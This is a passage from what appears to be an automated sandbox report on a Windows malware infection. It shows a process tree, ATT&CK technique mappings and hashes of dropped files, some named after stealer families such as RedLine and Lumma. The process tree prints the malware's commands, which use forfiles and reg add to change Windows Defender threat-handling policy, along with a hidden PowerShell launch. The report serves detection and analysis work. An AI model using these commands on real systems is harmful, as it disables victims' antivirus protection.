                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:5312
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:2420
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:5724
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:2724
                                                                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                      PID:5716
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:4488
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:2536
                                                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:2224
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:5448
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                              PID:5536
                                                                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:5352
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:5636
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:5320
                                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:4792
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:4076
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:352
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                            PID:5380
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5312 -s 564
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                      PID:4320
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 6004 -ip 6004
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:2944
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6004 -ip 6004
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:5916
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6004 -ip 6004
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:3028
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6004 -ip 6004
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:5448
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5312 -ip 5312
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:5444
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6004 -ip 6004
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:5352
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6004 -ip 6004
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:5612
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5920 -ip 5920
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:6136

                                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                                  MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                                                  Execution

                                                                                                                                                                                                                                                                                  Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1059

                                                                                                                                                                                                                                                                                  PowerShell

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1059.001

                                                                                                                                                                                                                                                                                  System Services

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1569

                                                                                                                                                                                                                                                                                  Service Execution

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1569.002

                                                                                                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                  Persistence

                                                                                                                                                                                                                                                                                  Create or Modify System Process

                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                  T1543

                                                                                                                                                                                                                                                                                  Windows Service

                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                  T1543.003

                                                                                                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                  Privilege Escalation

                                                                                                                                                                                                                                                                                  Create or Modify System Process

                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                  T1543

                                                                                                                                                                                                                                                                                  Windows Service

                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                  T1543.003

                                                                                                                                                                                                                                                                                  Scheduled Task/Job

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1053

                                                                                                                                                                                                                                                                                  Defense Evasion

                                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                                  Impair Defenses

                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                  T1562

                                                                                                                                                                                                                                                                                  Disable or Modify System Firewall

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1562.004

                                                                                                                                                                                                                                                                                  Subvert Trust Controls

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1553

                                                                                                                                                                                                                                                                                  Install Root Certificate

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1553.004

                                                                                                                                                                                                                                                                                  Modify Registry

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1112

                                                                                                                                                                                                                                                                                  Discovery

                                                                                                                                                                                                                                                                                  Query Registry

                                                                                                                                                                                                                                                                                  4
                                                                                                                                                                                                                                                                                  T1012

                                                                                                                                                                                                                                                                                  Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                  2
                                                                                                                                                                                                                                                                                  T1497

                                                                                                                                                                                                                                                                                  System Information Discovery

                                                                                                                                                                                                                                                                                  3
                                                                                                                                                                                                                                                                                  T1082

                                                                                                                                                                                                                                                                                  Command and Control

                                                                                                                                                                                                                                                                                  Web Service

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1102

                                                                                                                                                                                                                                                                                  Impact

                                                                                                                                                                                                                                                                                  Service Stop

                                                                                                                                                                                                                                                                                  1
                                                                                                                                                                                                                                                                                  T1489

                                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    288KB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    d9ec6f3a3b2ac7cd5eef07bd86e3efbc

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    e1908caab6f938404af85a7df0f80f877a4d9ee6

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.5MB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    e6943a08bb91fc3086394c7314be367d

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    451d2e171f906fa6c43f8b901cd41b0283d1fa40

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    6.2MB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    1bacbebf6b237c75dbe5610d2d9e1812

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    3ca5768a9cf04a2c8e157d91d4a1b118668f5cf1

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    c3747b167c70fd52b16fb93a4f815e7a4ee27cf67d2c7d55ea9d1edc7969c67d

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    f6438eced6915890d5d15d853c3ad6856de949b7354dcea97b1cf40d0c8aed767c8e45730e64ab0368f3606da5e95fd1d4db9cc21e613d517f37ddebbd0fa1fe

                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    13.2MB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    72b396a9053dff4d804e07ee1597d5e3

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    5ec4fefa66771613433c17c11545c6161e1552d5

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\installc.bat
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    301B

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    998ab24316795f67c26aca0f1b38c8ce

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\installg.bat
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    284B

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    5dee3cbf941c5dbe36b54690b2a3c240

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\GameSyncLink\installm.bat
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    218B

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    94b87b86dc338b8f0c4e5869496a8a35

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    2584e6496d048068f61ac72f5c08b54ad08627c3

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\[email protected]
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    654B

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    5cdfc4b9de66db60219b702987b6884f

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    3f664159cd6af48abc3f4c4a2d0ec16ff715b208

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    9a52a5e9dcfcc59699cab7a8777c114d2b9685e68b00502c0bfb28b42ef3321d

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    3c14da8a340736a697b4b2188b1b250b7328278a11e3483cc684247a2c10fc2b69435013e2704275dae319d992a048ff66a074065e91e9a2f65cfbd24a874d1d

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    830B

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    a483da8b27289fc9cc49d6b17e61cbf6

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    2d4a5a704c2ff332df6436b7bcd16365f03c2a97

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    f7785d4e80691cb2bb59301fe8962e50862c44d8992a0e308f86689b7ee76911

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    e0d061a5ed7c7789d11331b192c0693e9a49398de371153d1d13a8b7a32ae7078ea103b03a535ebd0581f1d9d56bacf77b9e31f68ab1888663111e8d2afea0a9

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    2.7MB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    31841361be1f3dc6c2ce7756b490bf0f

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    ff2506641a401ac999f5870769f50b7326f7e4eb

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    402KB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    7f981db325bfed412599b12604bd00ab

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    9f8a8fd9df3af3a4111e429b639174229c0c10cd

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    043839a678bed1b10be00842eae413f5ecd1cad7a0eaa384dd80bc1dcd31e69b

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    a5be61416bc60669523e15213098a6d3bb5a2393612b57863fedfa1ff974bc110e0b7e8aadc97d0c9830a80798518616f9edfb65ae22334a362a743b6af3a82d

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    9faf597de46ed64912a01491fe550d33

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    49203277926355afd49393782ae4e01802ad48af

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    0854678d655668c8ebb949c990166e26a4c04aef4ecf0191a95693ca150a9715

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    ef8a7a8566eaf962c4e21d49d9c1583ed2cdc9c2751ce75133a9765d2fa6dc511fc6cc99ea871eb83d50bd08a31cb0b25c03f27b8e6f351861231910a6cf1a1e

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4.2MB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    0f52e5e68fe33694d488bfe7a1a71529

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    11d7005bd72cb3fd46f24917bf3fc5f3203f361f

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    808c0214e53b576530ee5b4592793bb0

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    3fb03784f5dab1e99d5453664bd3169eff495c97

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    434b1a9bd966d204eef1f4cddb7b73a91ebc5aaf4ac9b4ddd999c6444d92eb61

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    2db3b4cb0233230e7c21cd820bde5de00286fbaedd3fe4dcefb6c66fe6867431f0ee1753fc18dcb89b2a18e888bd15d4d2de29b1d5cd93e425e3fcfe508c79c0

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    1.2MB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    56e7d98642cfc9ec438b59022c2d58d7

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    26526f702e584d8c8b629b2db5d282c2125665d7

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    a2aa61942bae116f8c855fda0e9a991dba92b3a1e2f147aee0e7e2be1bdea383

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    0be0b11de472029bd4e2268cddb5ddb381f7f275dfe50c47b9c836980e5cbfa7f71fe78804ef2180ee110ca9cf36944ec8b8b22babb31a1fc7a6585f79932a1f

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    418KB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    0099a99f5ffb3c3ae78af0084136fab3

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    0205a065728a9ec1133e8a372b1e3864df776e8c

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    749KB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    ec071dde7d9bec968e6765d245824a66

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    06f82c9e241ba768a43009925a5b081f8f955932

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    21aaa33d1cd4d9f0de4f60a35c4694ba926e7e01118a8c14b2fd8856a71774c9

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    cd87e5a07480c84ef9cf3dfd5feeb81506d1ecce49b17c6587cb3163ab2d9d3cc8ac1ebfbbb5b08cef7a74f07ead2bb6fa1bccb290fe1b31ce7dd8d1751325e3

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000043001\Kaxhwswfup.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    4.5MB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    133fda00a490e613f3a6c511c1c660eb

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    284KB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    9b9b6eed588a5f1c17864c641aaf22d3

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    ec9deea514e43c1cea5b3c35baadac1e6d05dec2

                                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                                    d19ddc1ec032c500925756a79726b27a77b677b5bc17e38eb4ab03a9b66e479c

                                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                                    046dd3c421fb7222d78998f912f0be3bb0edb2b6efdfd909e2c613373a43c59d8fe6a2577e669436813da3744e4dd6be84733b8ca14d4feee901e6034e4efb47

                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe
                                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                                    226KB

                                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                                    dcfd9f02149a657f70ed4e58f5c71d74

                                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                                    93140ba9a84c78ee3a4aece21c0d832e334efb2a

